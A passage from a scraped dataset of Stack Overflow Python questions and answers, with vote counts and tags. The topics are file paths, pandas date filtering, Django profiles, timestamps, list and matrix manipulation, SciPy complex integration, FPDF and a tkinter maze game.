"add library to code :\nfrom pathlib import Path\n\nwhen u want get current path without filename use this method :\nprint(\"Directory Path:\", Path().absolute())\n\nnow you just need to add the file name to it :for example\n mylink = str(Path().absolute())+\"/\"+\"filename.etc\" #str(Path().absolute())+\"/\"+\"hello.txt\"\n\nIf normally addes to the first path \"r\" character\nfor example: r\"c://...\"\nYou do not need to do here\n",
"You can also simply add the strings together. Personally I like this more.\nfilename = r\"{}{}{}\".format(dir, foldername, filename)\n\n"
] | [
25,
7,
2,
2,
1,
0,
0
] | [] | [] | [
"filepath",
"path",
"python"
] | stackoverflow_0040596748_filepath_path_python.txt |
Q:
modifying dataframe through specifics dates
I've a timeseries that i need pass a equation in the same day and month across the years
Name | date | value | Type
player 1 | 2010/02/10 | 100 | 2
player 2 | 2011/16/15 | 200 | 3
player 3 | 2012/02/10 | 150 | 4
player 4 | 2013/11/16 | 136 | 5
player 5 | 2014/02/10 | 94 | 6
I need change my column 'Type' for my dates where the month and day be equal to 'YYYY/02/10' ignoring the years, and if this be a weekend use the next useful day.
My final data should be like
Name | date | value | Type
player 1 | 2010/02/10 | 100 | 2
player 2 | 2011/16/15 | 200 | 3
player 3 | 2012/02/10 | 150 | 2
player 4 | 2013/11/16 | 136 | 5
player 5 | 2014/02/10 | 94 | 2
My timeseries is huge, so i cannot use a loop like for i in list where my list are all years then pass a f-string like f'{i/02/10} because i need a little more performance.
Any idea how i can do that?
A:
If you have strings:
df.loc[df['date'].str.endswith('02/10'), 'Type'] = 2
For datetime type:
df.loc[df['date'].dt.strftime('%d/%m').eq('02/10'), 'Type'] = 2
Output:
Name date value Type
0 player 1 2010/02/10 100 2
1 player 2 2011/16/15 200 3
2 player 3 2012/02/10 150 2
3 player 4 2013/11/16 136 5
4 player 5 2014/02/10 94 2
| modifying dataframe through specifics dates | I've a timeseries that i need pass a equation in the same day and month across the years
Name | date | value | Type
player 1 | 2010/02/10 | 100 | 2
player 2 | 2011/16/15 | 200 | 3
player 3 | 2012/02/10 | 150 | 4
player 4 | 2013/11/16 | 136 | 5
player 5 | 2014/02/10 | 94 | 6
I need change my column 'Type' for my dates where the month and day be equal to 'YYYY/02/10' ignoring the years, and if this be a weekend use the next useful day.
My final data should be like
Name | date | value | Type
player 1 | 2010/02/10 | 100 | 2
player 2 | 2011/16/15 | 200 | 3
player 3 | 2012/02/10 | 150 | 2
player 4 | 2013/11/16 | 136 | 5
player 5 | 2014/02/10 | 94 | 2
My timeseries is huge, so i cannot use a loop like for i in list where my list are all years then pass a f-string like f'{i/02/10} because i need a little more performance.
Any idea how i can do that?
| [
"If you have strings:\ndf.loc[df['date'].str.endswith('02/10'), 'Type'] = 2\n\nFor datetime type:\ndf.loc[df['date'].dt.strftime('%d/%m').eq('02/10'), 'Type'] = 2\n\nOutput:\n Name date value Type\n0 player 1 2010/02/10 100 2\n1 player 2 2011/16/15 200 3\n2 player 3 2012/02/10 150 2\n3 player 4 2013/11/16 136 5\n4 player 5 2014/02/10 94 2\n\n"
] | [
0
] | [] | [] | [
"numpy",
"python",
"python_3.x"
] | stackoverflow_0074602892_numpy_python_python_3.x.txt |
Q:
Djnago how to split users and customres
In my project (small online shop) I need to split registration for users and customers.
So the information what I found when somebody registered in django then his account stored in one table, in this table I can see admin user and staff and another registered accounts, and I can sse them all in admin on Users page. But I do not want ot put all accounts in one "basket". I need split them fro different tables.
For example superuser can create in admin area a new user (content manager) and provide him access/permission to manage admin area (create product etc.) - this users and super user will be on default User page. On the page Customers will be displaying only users who registered for example via https://mysite/account/register page, after registration this customer account I can see in Customers page in the admin area but not in Users page. And this customer can login to his account for example via https://mysite/account/login
Is this possible?
A:
As Jay said, everyone registered in the database is still a User whatever their role may be (admin, superuser, customer). What you could do is create a Profile model where everyone will have their information such as telephone, location etc, and you will also add another field clarifying their property.
PACKAGES = [
('customer', 'Customer'),
('support', 'Support'),
('admin', 'Admin'),
]
class Profile(models.Model):
user = models.OneToOneField(User, on_delete=models.CASCADE, primary_key=True)
image = models.ImageField(default='user_avatar.png', upload_to='...')
last_visit = models.DateField(default=timezone.now, blank=True)
location = models.CharField(max_length=254, null=True, blank=True)
contact_phone = models.CharField(max_length=15)
user_role = models.CharField(default="customer", choices=PACKAGES, max_length=20)
Then all you need to do is edit your admin.py to implement a search parameter there:
class ProfileAdmin(admin.ModelAdmin):
list_filter=('user_role',)
admin.site.register(Profile, ProfileAdmin)
Doing that will give you a filter_list in the right corner of your admin page but that is for admin page only.
If you want to access different roles in your views or your templates you will do so by getting the user_role you need:
customers = Profile.objects.filter(user_role='customer')
| Djnago how to split users and customres | In my project (small online shop) I need to split registration for users and customers.
So the information what I found when somebody registered in django then his account stored in one table, in this table I can see admin user and staff and another registered accounts, and I can sse them all in admin on Users page. But I do not want ot put all accounts in one "basket". I need split them fro different tables.
For example superuser can create in admin area a new user (content manager) and provide him access/permission to manage admin area (create product etc.) - this users and super user will be on default User page. On the page Customers will be displaying only users who registered for example via https://mysite/account/register page, after registration this customer account I can see in Customers page in the admin area but not in Users page. And this customer can login to his account for example via https://mysite/account/login
Is this possible?
| [
"As Jay said, everyone registered in the database is still a User whatever their role may be (admin, superuser, customer). What you could do is create a Profile model where everyone will have their information such as telephone, location etc, and you will also add another field clarifying their property.\nPACKAGES = [\n ('customer', 'Customer'),\n ('support', 'Support'),\n ('admin', 'Admin'),\n]\n\nclass Profile(models.Model):\n user = models.OneToOneField(User, on_delete=models.CASCADE, primary_key=True)\n image = models.ImageField(default='user_avatar.png', upload_to='...')\n last_visit = models.DateField(default=timezone.now, blank=True)\n location = models.CharField(max_length=254, null=True, blank=True)\n contact_phone = models.CharField(max_length=15)\n user_role = models.CharField(default=\"customer\", choices=PACKAGES, max_length=20)\n \n\nThen all you need to do is edit your admin.py to implement a search parameter there:\nclass ProfileAdmin(admin.ModelAdmin):\n list_filter=('user_role',)\n\nadmin.site.register(Profile, ProfileAdmin)\n\nDoing that will give you a filter_list in the right corner of your admin page but that is for admin page only.\nIf you want to access different roles in your views or your templates you will do so by getting the user_role you need:\ncustomers = Profile.objects.filter(user_role='customer')\n\n"
] | [
2
] | [] | [] | [
"django",
"python",
"python_3.x"
] | stackoverflow_0074602189_django_python_python_3.x.txt |
Q:
Python: How to convert Timestamp which of precision 9 to datetime object?
I am fetching crypto data from the ByBit exchange which is returning the timestamp field created_at_e9 in the following format: 1663315207126761200
The standard is 11 -13 digits but here are 20 digits. How do I fetch the DateTime from it?
A:
You can look at this so see how to convert a timestamp into a datetime in python. And since the timestamp presision is 1e9 you can simply multiply the value by 1e-9 or divide it by 1e9 to get the timestamp in seconds.
from datetime import datetime
datetime.fromtimestamp(created_at_e9 * 1e-9)
| Python: How to convert Timestamp which of precision 9 to datetime object? | I am fetching crypto data from the ByBit exchange which is returning the timestamp field created_at_e9 in the following format: 1663315207126761200
The standard is 11 -13 digits but here are 20 digits. How do I fetch the DateTime from it?
| [
"You can look at this so see how to convert a timestamp into a datetime in python. And since the timestamp presision is 1e9 you can simply multiply the value by 1e-9 or divide it by 1e9 to get the timestamp in seconds.\nfrom datetime import datetime\ndatetime.fromtimestamp(created_at_e9 * 1e-9)\n\n"
] | [
1
] | [] | [] | [
"datetime",
"python",
"unix_timestamp"
] | stackoverflow_0074602919_datetime_python_unix_timestamp.txt |
Q:
Transforming a matrix by placing its elements in the reverse order of the initial in python
im looking to solve the problem mentioned in the title without any specific functions that may or may not exist for this[]. Something along the lines of using mostly loops.
I tought about reversing each individual row using list.reverse() and then moving the rows around but im not sure how to implement it.
A:
try this new realization and this will not change the original Matrix
Matrix = [[1,2,3],[4,5,6],[7,8,9]]
newMatrix = []
for line in range(len(Matrix)):
newMatrix.append(sorted(Matrix[line],reverse=True))
newMatrix.reverse()
print(newMatrix)
print(Matrix)
output:
[[9, 8, 7], [6, 5, 4], [3, 2, 1]]
[[1, 2, 3], [4, 5, 6], [7, 8, 9]]
| Transforming a matrix by placing its elements in the reverse order of the initial in python | im looking to solve the problem mentioned in the title without any specific functions that may or may not exist for this[]. Something along the lines of using mostly loops.
I tought about reversing each individual row using list.reverse() and then moving the rows around but im not sure how to implement it.
| [
"try this new realization and this will not change the original Matrix\nMatrix = [[1,2,3],[4,5,6],[7,8,9]]\nnewMatrix = []\nfor line in range(len(Matrix)):\n newMatrix.append(sorted(Matrix[line],reverse=True))\n\nnewMatrix.reverse()\nprint(newMatrix)\nprint(Matrix)\n\noutput:\n[[9, 8, 7], [6, 5, 4], [3, 2, 1]]\n[[1, 2, 3], [4, 5, 6], [7, 8, 9]]\n\n"
] | [
-1
] | [
"Try This\nMatrix = [[1,2,3],[4,5,6],[7,8,9]]\nnewMatrix = []\nfor line in range(len(Matrix)):\n Matrix[line].reverse()\n newMatrix.append(Matrix[line])\n\nnewMatrix.reverse()\nprint(newMatrix)\n\noutput\n[[9, 8, 7], [6, 5, 4], [3, 2, 1]]\n\n"
] | [
-1
] | [
"matrix",
"python"
] | stackoverflow_0074602732_matrix_python.txt |
Q:
solve_ivp discards imaginary part of complex solution
I am computing a solution to the free basis expansion of the dirac equation for electron-positron pairproduction. For this i need to solve a system of equations that looks like this:
Equation for pairproduction, from Mocken at al.
EDIT: This has been solved by passing y0 as complex type into the solver. As is stated in this issue: https://github.com/scipy/scipy/issues/8453 I would definitely consider this a bug but it seems like it has gone under the rock for at least 4 years
for this i am using SciPy's solve_ivp integrator in the following way:
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.ticker as ticker
from scipy.integrate import solve_ivp
import scipy.constants as constants
#Impulse
px, py = 0 , 0
#physics constants
e = constants.e
m = constants.m_e # electronmass
c = constants.c
hbar = constants.hbar
#relativistic energy
E = np.sqrt(m**2 *c**4 + (px**2+py**2) * c**2) # E_p
#adiabatic parameter
xi = 1
#Parameter of the system
w = 0.840 #frequency in 1/m_e
N = 8 # amount of amplitudes in window
T = 2* np.pi/w
#unit system
c = 1
hbar = 1
m = 1
#strength of electric field
E_0 = xi*m*c*w/e
print(E_0)
#vectorpotential
A = lambda t,F: -E_0/w *np.sin(t)*F
def linearFenster2(t):
conditions = [t <=0, (t/w>=0) and (t/w <= T/2), (t/w >= T/2) and (t/w<=T*(N+1/2)), (t/w>=T*(N+1/2)) and (t/w<=T*(N+1)), t/w>=T*(N+1)]
funcs = [lambda t: 0, lambda t: 1/np.pi *t, lambda t: 1, lambda t: 1-w/np.pi * (t/w-T*(N+1/2)), lambda t: 0]
return np.piecewise(t,conditions,funcs)
#Coefficient functions
nu = lambda t: -1j/hbar *e*A(w*t,linearFenster2(w*t)) *np.exp(2*1j/hbar * E*t) *(px*py*c**2 /(E*(E+m*c**2)) + 1j*(1- c**2 *py**2/(E*(E+m*c**2))))
kappa = lambda t: 1j*e*A(t,linearFenster2(w*t))* c*py/(E * hbar)
#System to solve
def System(t, y, nu, kappa):
df = kappa(t) *y[0] + nu(t) * y[1]
dg = -np.conjugate(nu(t)) * y[0] + np.conjugate(kappa(t))*y[1]
return np.array([df,dg], dtype=np.cdouble)
def solver(tmin, tmax,teval=None,f0=0,g0=1):
'''solves the system.
@tmin: starttime
@tmax: endtime
@f0: starting percentage of already present electrons of positive energy usually 0
@g0: starting percentage of already present electrons of negative energy, usually 1, therefore full vaccuum
'''
y0=[f0,g0]
tspan = np.array([tmin, tmax])
koeff = np.array([nu,kappa])
sol = solve_ivp(System,tspan,y0,t_eval= teval,args=koeff)
return sol
#Plotting of windowfunction
amount = 10**2
t = np.arange(0, T*(N+1), 1/amount)
vlinearFenster2 = np.array([linearFenster2(w*a) for a in t ], dtype = float)
fig3, ax3 = plt.subplots(1,1,figsize=[24,8])
ax3.plot(t,E_0/w * vlinearFenster2)
ax3.plot(t,A(w*t,vlinearFenster2))
ax3.plot(t,-E_0 /w * vlinearFenster2)
ax3.xaxis.set_minor_locator(ticker.AutoMinorLocator())
ax3.set_xlabel("t in s")
ax3.grid(which = 'both')
plt.show()
sol = solver(0, 70,teval = t)
ts= sol.t
f=sol.y[0]
fsquared = 2* np.absolute(f)**2
plt.plot(ts,fsquared)
plt.show()
The plot for the window function looks like this (and is correct)
window function
however the plot for the solution looks like this:
Plot of pairproduction probability
This is not correct based on the papers graphs (and further testing using mathematica instead).
When running the line 'sol = solver(..)' it says:
\numpy\core\_asarray.py:102: ComplexWarning: Casting complex values to real discards the imaginary part
return array(a, dtype, copy=False, order=order)
I simply do not know why solve_ivp discard the imaginary part. Its absolutely necessary.
Can someone enlighten me who knows more or sees the mistake?
A:
According to the documentation, the y0 passed to solve_ivp must be of type complex in order for the integration to be over the complex domain. A robust way of ensuring this is to add the following to your code:
def solver(tmin, tmax,teval=None,f0=0,g0=1):
'''solves the system.
@tmin: starttime
@tmax: endtime
@f0: starting percentage of already present electrons of positive energy usually 0
@g0: starting percentage of already present electrons of negative energy, usually 1, therefore full vaccuum
'''
f0 = complex(f0) # <-- added
g0 = complex(g0) # <-- added
y0=[f0,g0]
tspan = np.array([tmin, tmax])
koeff = np.array([nu,kappa])
sol = solve_ivp(System,tspan,y0,t_eval= teval,args=koeff)
return sol
I tried the above, and it indeed made the warning disappear. However, the result of the integration seems to be the same regardless.
| solve_ivp discards imaginary part of complex solution | I am computing a solution to the free basis expansion of the dirac equation for electron-positron pairproduction. For this i need to solve a system of equations that looks like this:
Equation for pairproduction, from Mocken at al.
EDIT: This has been solved by passing y0 as complex type into the solver. As is stated in this issue: https://github.com/scipy/scipy/issues/8453 I would definitely consider this a bug but it seems like it has gone under the rock for at least 4 years
for this i am using SciPy's solve_ivp integrator in the following way:
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.ticker as ticker
from scipy.integrate import solve_ivp
import scipy.constants as constants
#Impulse
px, py = 0 , 0
#physics constants
e = constants.e
m = constants.m_e # electronmass
c = constants.c
hbar = constants.hbar
#relativistic energy
E = np.sqrt(m**2 *c**4 + (px**2+py**2) * c**2) # E_p
#adiabatic parameter
xi = 1
#Parameter of the system
w = 0.840 #frequency in 1/m_e
N = 8 # amount of amplitudes in window
T = 2* np.pi/w
#unit system
c = 1
hbar = 1
m = 1
#strength of electric field
E_0 = xi*m*c*w/e
print(E_0)
#vectorpotential
A = lambda t,F: -E_0/w *np.sin(t)*F
def linearFenster2(t):
conditions = [t <=0, (t/w>=0) and (t/w <= T/2), (t/w >= T/2) and (t/w<=T*(N+1/2)), (t/w>=T*(N+1/2)) and (t/w<=T*(N+1)), t/w>=T*(N+1)]
funcs = [lambda t: 0, lambda t: 1/np.pi *t, lambda t: 1, lambda t: 1-w/np.pi * (t/w-T*(N+1/2)), lambda t: 0]
return np.piecewise(t,conditions,funcs)
#Coefficient functions
nu = lambda t: -1j/hbar *e*A(w*t,linearFenster2(w*t)) *np.exp(2*1j/hbar * E*t) *(px*py*c**2 /(E*(E+m*c**2)) + 1j*(1- c**2 *py**2/(E*(E+m*c**2))))
kappa = lambda t: 1j*e*A(t,linearFenster2(w*t))* c*py/(E * hbar)
#System to solve
def System(t, y, nu, kappa):
df = kappa(t) *y[0] + nu(t) * y[1]
dg = -np.conjugate(nu(t)) * y[0] + np.conjugate(kappa(t))*y[1]
return np.array([df,dg], dtype=np.cdouble)
def solver(tmin, tmax,teval=None,f0=0,g0=1):
'''solves the system.
@tmin: starttime
@tmax: endtime
@f0: starting percentage of already present electrons of positive energy usually 0
@g0: starting percentage of already present electrons of negative energy, usually 1, therefore full vaccuum
'''
y0=[f0,g0]
tspan = np.array([tmin, tmax])
koeff = np.array([nu,kappa])
sol = solve_ivp(System,tspan,y0,t_eval= teval,args=koeff)
return sol
#Plotting of windowfunction
amount = 10**2
t = np.arange(0, T*(N+1), 1/amount)
vlinearFenster2 = np.array([linearFenster2(w*a) for a in t ], dtype = float)
fig3, ax3 = plt.subplots(1,1,figsize=[24,8])
ax3.plot(t,E_0/w * vlinearFenster2)
ax3.plot(t,A(w*t,vlinearFenster2))
ax3.plot(t,-E_0 /w * vlinearFenster2)
ax3.xaxis.set_minor_locator(ticker.AutoMinorLocator())
ax3.set_xlabel("t in s")
ax3.grid(which = 'both')
plt.show()
sol = solver(0, 70,teval = t)
ts= sol.t
f=sol.y[0]
fsquared = 2* np.absolute(f)**2
plt.plot(ts,fsquared)
plt.show()
The plot for the window function looks like this (and is correct)
window function
however the plot for the solution looks like this:
Plot of pairproduction probability
This is not correct based on the papers graphs (and further testing using mathematica instead).
When running the line 'sol = solver(..)' it says:
\numpy\core\_asarray.py:102: ComplexWarning: Casting complex values to real discards the imaginary part
return array(a, dtype, copy=False, order=order)
I simply do not know why solve_ivp discard the imaginary part. Its absolutely necessary.
Can someone enlighten me who knows more or sees the mistake?
| [
"According to the documentation, the y0 passed to solve_ivp must be of type complex in order for the integration to be over the complex domain. A robust way of ensuring this is to add the following to your code:\ndef solver(tmin, tmax,teval=None,f0=0,g0=1):\n '''solves the system.\n @tmin: starttime\n @tmax: endtime\n @f0: starting percentage of already present electrons of positive energy usually 0 \n @g0: starting percentage of already present electrons of negative energy, usually 1, therefore full vaccuum\n '''\n f0 = complex(f0) # <-- added\n g0 = complex(g0) # <-- added\n y0=[f0,g0]\n tspan = np.array([tmin, tmax])\n koeff = np.array([nu,kappa])\n sol = solve_ivp(System,tspan,y0,t_eval= teval,args=koeff)\n return sol\n\nI tried the above, and it indeed made the warning disappear. However, the result of the integration seems to be the same regardless.\n"
] | [
0
] | [] | [] | [
"physics",
"python"
] | stackoverflow_0074602588_physics_python.txt |
Q:
Index page on FPDF. How to write to an existing page?
This question is related to this one.
I need to add an index page to the PDF and it needs to be placed after the main page.
So, the index should be on page 2 onwards.
I can add a blank page as a placeholder so that the others get the correct page number, then at the end when all pages are created I need to go back to the blank page and write the index (or create at the end of the document and replace the existing blank one).
If the index is more than one page (second problem) all the pages will need to update the index.
I can easily count the number of titles and estimate the amount of pages needed for the index.
How can I do this?
A:
Well, it's easier than I thought, I'll leave it here just in case someone stumbles upon the same issue.
1 step: calculate the number of pages the index will need and add them as blank pages, not required, but will make the page numbers correct already
2 step: before finalizing the document, use self.page = 2 to start adding content to page 2, this will use the blank pages used in the previous step
| Index page on FPDF. How to write to an existing page? | This question is related to this one.
I need to add an index page to the PDF and it needs to be placed after the main page.
So, the index should be on page 2 onwards.
I can add a blank page as a placeholder so that the others get the correct page number, then at the end when all pages are created I need to go back to the blank page and write the index (or create at the end of the document and replace the existing blank one).
If the index is more than one page (second problem) all the pages will need to update the index.
I can easily count the number of titles and estimate the amount of pages needed for the index.
How can I do this?
| [
"Well, it's easier than I thought, I'll leave it here just in case someone stumbles upon the same issue.\n1 step: calculate the number of pages the index will need and add them as blank pages, not required, but will make the page numbers correct already\n2 step: before finalizing the document, use self.page = 2 to start adding content to page 2, this will use the blank pages used in the previous step\n"
] | [
0
] | [] | [] | [
"fpdf",
"python"
] | stackoverflow_0074465361_fpdf_python.txt |
Q:
Splitting lists into to different lists
I have a list:
list = [['X', 'Y'], 'A', 1, 2, 3]
That I want to split into:
new_list = [['X','A', 1, 2, 3] , ['Y', 'A', 1, 2, 3]]
Is this possible?
A:
Sure, take off the first element to create an outer loop, and then loop over the rest of the list to build the sub-lists:
lst = [['X', 'Y'], 'A', 1, 2, 3]
new_list = []
for item in lst[0]:
sub = [item]
for sub_item in lst[1:]:
sub.append(sub_item)
new_list.append(sub)
Or, as a comprehension:
new_list = [[item, *lst[1:]] for item in lst[0]]
Where the *lst[1:] will unpack the slice into the newly created list.
Borrowing that idea for the imperative for-loop:
new_list = []
for item in lst[0]:
sub = [item, *lst[1:]]
new_list.append(sub)
A:
I'll suggest a more concise approach that uses iterable unpacking -- IMO it's cleaner than using list slices.
We take the first element of lst and separate it from the rest of the list. Then, we use a list comprehension to create a new list for every element in the original sublist of lst:
lst = [['X', 'Y'], 'A', 1, 2, 3]
fst, *rest = lst
[[elem, *rest] for elem in fst]
This outputs:
[['X', 'A', 1, 2, 3], ['Y', 'A', 1, 2, 3]]
A:
This probably not the best aproach but it works
l = [['X', 'Y'], 'A', 1, 2, 3]
new_list = []
to_append = []
for item in l:
if isinstance(item, list):
new_list.append(item)
continue
to_append.append(item)
new_list.append(to_append)
print(new_list)
A:
Yes, the code below returns exactly what you want.
list = [['X', 'Y'], 'A', 1, 2, 3]
new_list = []
for i, item in enumerate(list[0]):
new_list.append([item] + list[1:])
print(new_list)
| Splitting lists into to different lists | I have a list:
list = [['X', 'Y'], 'A', 1, 2, 3]
That I want to split into:
new_list = [['X','A', 1, 2, 3] , ['Y', 'A', 1, 2, 3]]
Is this possible?
| [
"Sure, take off the first element to create an outer loop, and then loop over the rest of the list to build the sub-lists:\nlst = [['X', 'Y'], 'A', 1, 2, 3]\n\nnew_list = []\n\nfor item in lst[0]:\n sub = [item]\n for sub_item in lst[1:]:\n sub.append(sub_item)\n new_list.append(sub)\n\nOr, as a comprehension:\nnew_list = [[item, *lst[1:]] for item in lst[0]]\n\nWhere the *lst[1:] will unpack the slice into the newly created list.\nBorrowing that idea for the imperative for-loop:\nnew_list = []\n\nfor item in lst[0]:\n sub = [item, *lst[1:]]\n new_list.append(sub)\n\n",
"I'll suggest a more concise approach that uses iterable unpacking -- IMO it's cleaner than using list slices.\nWe take the first element of lst and separate it from the rest of the list. Then, we use a list comprehension to create a new list for every element in the original sublist of lst:\nlst = [['X', 'Y'], 'A', 1, 2, 3]\nfst, *rest = lst\n\n[[elem, *rest] for elem in fst]\n\nThis outputs:\n[['X', 'A', 1, 2, 3], ['Y', 'A', 1, 2, 3]]\n\n",
"This probably not the best aproach but it works\nl = [['X', 'Y'], 'A', 1, 2, 3]\n\nnew_list = []\nto_append = []\nfor item in l:\n if isinstance(item, list):\n new_list.append(item)\n continue\n\n to_append.append(item)\n\nnew_list.append(to_append)\nprint(new_list)\n\n",
"Yes, the code below returns exactly what you want.\nlist = [['X', 'Y'], 'A', 1, 2, 3]\nnew_list = []\n\nfor i, item in enumerate(list[0]):\n new_list.append([item] + list[1:])\n\nprint(new_list)\n\n"
] | [
2,
2,
0,
0
] | [] | [] | [
"list",
"python"
] | stackoverflow_0074603020_list_python.txt |
Q:
How to loop the maze
I'm a beginner with python. I couldn't figure out how to start new game in my maze.
I have tried various options but they all end whe with errors. What should I do? Thank you in advance.
I have tried destroy the frame_top where maze is located then create another maze with function new_game. But this function calls errors:
import tkinter as tk
import random
from tkinter import messagebox
global SIZE
global ROW
global COLUMN
SIZE = 10
COLUMN = 7
ROW = 7
departure = [[1, 1]]
playerX = 1
playerY = 1
beforeX = 1
beforeY = 1
maze = []
for y in range(ROW) :
sub = []
for x in range(COLUMN) :
if y==0 or y==ROW-1 or x==0 or x==COLUMN-1 :
sub.append("WALL")
else :
sub.append("FIELD")
maze.append(sub)
def dig(x, y) :
maze[y][x] = "PATH"
canMove = []
if maze[y-1][x]=="FIELD" and maze[y-2][x]=="FIELD" :
canMove.append("UP")
if maze[y+1][x]=="FIELD" and maze[y+2][x]=="FIELD" :
canMove.append("DOWN")
if maze[y][x-1]=="FIELD" and maze[y][x-2]=="FIELD" :
canMove.append("LEFT")
if maze[y][x+1]=="FIELD" and maze[y][x+2]=="FIELD" :
canMove.append("RIGHT")
if len(canMove)==0 :
return
direction = random.choice(canMove)
if direction=="UP" :
maze[y-1][x]="PATH"
maze[y-2][x]="PATH"
y -= 2
if direction=="DOWN" :
maze[y+1][x]="PATH"
maze[y+2][x]="PATH"
y += 2
if direction=="LEFT" :
maze[y][x-1]="PATH"
maze[y][x-2]="PATH"
x -= 2
if direction=="RIGHT" :
maze[y][x+1]="PATH"
maze[y][x+2]="PATH"
x += 2
departure.append([x, y])
dig(x, y)
## print(departure)
## print(dig(x, y))
def keyPress(event) :
global playerX,playerY,beforeX,beforeY
if event.keysym=="Up" and maze[playerY-1][playerX]=="PATH" :
beforeX = playerX
beforeY = playerY
playerY -=1
if event.keysym=="Down" and maze[playerY+1][playerX]=="PATH" :
beforeX = playerX
beforeY = playerY
playerY +=1
if event.keysym=="Left" and maze[playerY][playerX-1]=="PATH" :
beforeX = playerX
beforeY = playerY
playerX -=1
if event.keysym=="Right" and maze[playerY][playerX+1]=="PATH" :
beforeX = playerX
beforeY = playerY
playerX +=1
def move() :
can.create_oval(beforeX*SIZE+1, beforeY*SIZE+1, (beforeX+1)*SIZE-1, (beforeY+1)*SIZE-1, fill="white", width=0)
can.create_oval(playerX*SIZE+2, playerY*SIZE+2, (playerX+1)*SIZE-2, (playerY+1)*SIZE-2, fill="blue")
if playerX==COLUMN-2 and playerY==ROW-2 :
messagebox.showinfo("INFORMATION", "CONGRATULATIONS!!!")
frame_top.destroy()
## for widget in frame_top.winfo_children():
## widget.destroy()
new_game()
can.after(100, move)
def new_game():
departure = [[1, 1]]
playerX = 1
playerY = 1
beforeX = 1
beforeY = 1
maze = []
canMove = []
print (maze)
for y in range(ROW) :
sub = []
for x in range(COLUMN) :
if y==0 or y==ROW-1 or x==0 or x==COLUMN-1 :
sub.append("WALL")
else :
sub.append("FIELD")
maze.append(sub)
while len(departure)!=0 :
start = departure.pop(0)
x = start[0]
y = start[1]
dig(x, y)
print(x)
print(y)
for y in range(ROW):
for x in range(COLUMN):
if maze[y][x]=="PATH" :
color = "white"
else :
color = "black"
can.create_rectangle(x*SIZE, y*SIZE, (x+1)*SIZE, (y+1)*SIZE, fill=color, width=0)
can.create_rectangle((COLUMN-2)*SIZE, (ROW-2)*SIZE, (COLUMN-1)*SIZE, (ROW-1)*SIZE ,fill="red")
move()
global win
win = tk.Tk()
frame_top = tk.Frame(win)
frame_top.pack()
global can
can = tk.Canvas(frame_top, width=COLUMN*SIZE, height=ROW*SIZE)
can.pack()
m = tk.Menu(win)
win.config(menu=m)
fm = tk.Menu(m, tearoff=0)
om = tk.Menu(m, tearoff=0)
m.add_cascade(label='Options', menu=om)
om.add_command(label='New Game',command= new_game )
om.add_command(label='Settings', )
while len(departure)!=0 :
start = departure.pop(0)
x = start[0]
y = start[1]
dig(x, y)
print(x)
print(y)
for y in range(ROW):
for x in range(COLUMN):
if maze[y][x]=="PATH" :
color = "white"
else :
color = "black"
can.create_rectangle(x*SIZE, y*SIZE, (x+1)*SIZE, (y+1)*SIZE, fill=color, width=0)
can.create_rectangle((COLUMN-2)*SIZE, (ROW-2)*SIZE, (COLUMN-1)*SIZE, (ROW-1)*SIZE ,fill="red")
move()
win.bind("<Any-KeyPress>", keyPress)
win.mainloop()
main()
Exception in Tkinter callback
Traceback (most recent call last):
File "C:\Users\Admin\AppData\Local\Programs\Python\Python310\lib\tkinter\__init__.py", line 1921, in __call__
return self.func(*args)
File "C:\Users\Admin\AppData\Local\Programs\Python\Python310\lib\tkinter\__init__.py",
line 839, in callit
func(*args)
File "C:/Users/Admin/AppData/Local/Programs/Python/Python310/fileend.py",
line 92, in move
new_game()
File "C:/Users/Admin/AppData/Local/Programs/Python/Python310/fileend.py", line 128, in new_game
can.create_rectangle(x*SIZE, y*SIZE, (x+1)*SIZE, (y+1)*SIZE, fill=color, width=0)
File "C:\Users\Admin\AppData\Local\Programs\Python\Python310\lib\tkinter\__init__.py", line 2835, in create_rectangle
return self._create('rectangle', args, kw)
File "C:\Users\Admin\AppData\Local\Programs\Python\Python310\lib\tkinter\__init__.py", line 2805, in _create
return self.tk.getint(self.tk.call(
_tkinter.TclError: invalid command name ".!frame.!canvas"
A:
You use two different ways to create a new game. So it's differ from each other and you do not understand what you make wrong.One them main flow and other one is new_game method. I just merged them.
Second thing is you destroy your frame and your canvas inside it. So you also destroyed your canvas this is why yo get errors. Instead can.delete("all") going to clear all items inside.
You have keypress(event) function yo do not need to update tens of times every second your move(). Just if you get any press, simple update it by calling move function.
Other thing is, when you are moving inside maze, instead of moving your player you are creating a new blue dot and repaint your old dot. It's bad habit you should avoid it. If it would be too much movement inside your maze, that mess would cause to slow down.
Lastly, in your new_game method you need to use global keyword otherwise your declerations only creates local variables.
This is full solution. It correctly starts new games and contains all improvements mentioned above.
import tkinter as tk
import random
from tkinter import messagebox
SIZE = 10
COLUMN = 7
ROW = 7
departure = [[1, 1]]
playerX = 1
playerY = 1
beforeX = 1
beforeY = 1
maze = []
player = None
for y in range(ROW) :
sub = []
for x in range(COLUMN) :
if y==0 or y==ROW-1 or x==0 or x==COLUMN-1 :
sub.append("WALL")
else :
sub.append("FIELD")
maze.append(sub)
def dig(x, y) :
maze[y][x] = "PATH"
canMove = []
if maze[y-1][x]=="FIELD" and maze[y-2][x]=="FIELD" :
canMove.append("UP")
if maze[y+1][x]=="FIELD" and maze[y+2][x]=="FIELD" :
canMove.append("DOWN")
if maze[y][x-1]=="FIELD" and maze[y][x-2]=="FIELD" :
canMove.append("LEFT")
if maze[y][x+1]=="FIELD" and maze[y][x+2]=="FIELD" :
canMove.append("RIGHT")
if len(canMove)==0 :
return
direction = random.choice(canMove)
if direction=="UP" :
maze[y-1][x]="PATH"
maze[y-2][x]="PATH"
y -= 2
if direction=="DOWN" :
maze[y+1][x]="PATH"
maze[y+2][x]="PATH"
y += 2
if direction=="LEFT" :
maze[y][x-1]="PATH"
maze[y][x-2]="PATH"
x -= 2
if direction=="RIGHT" :
maze[y][x+1]="PATH"
maze[y][x+2]="PATH"
x += 2
departure.append([x, y])
dig(x, y)
def keyPress(event) :
global playerX,playerY,beforeX,beforeY
if event.keysym=="Up" and maze[playerY-1][playerX]=="PATH" :
beforeX = playerX
beforeY = playerY
playerY -=1
if event.keysym=="Down" and maze[playerY+1][playerX]=="PATH" :
beforeX = playerX
beforeY = playerY
playerY +=1
if event.keysym=="Left" and maze[playerY][playerX-1]=="PATH" :
beforeX = playerX
beforeY = playerY
playerX -=1
if event.keysym=="Right" and maze[playerY][playerX+1]=="PATH" :
beforeX = playerX
beforeY = playerY
playerX +=1
move()
def move() :
can.moveto(player,playerX*SIZE+1, playerY*SIZE+1)
print(playerX,playerY)
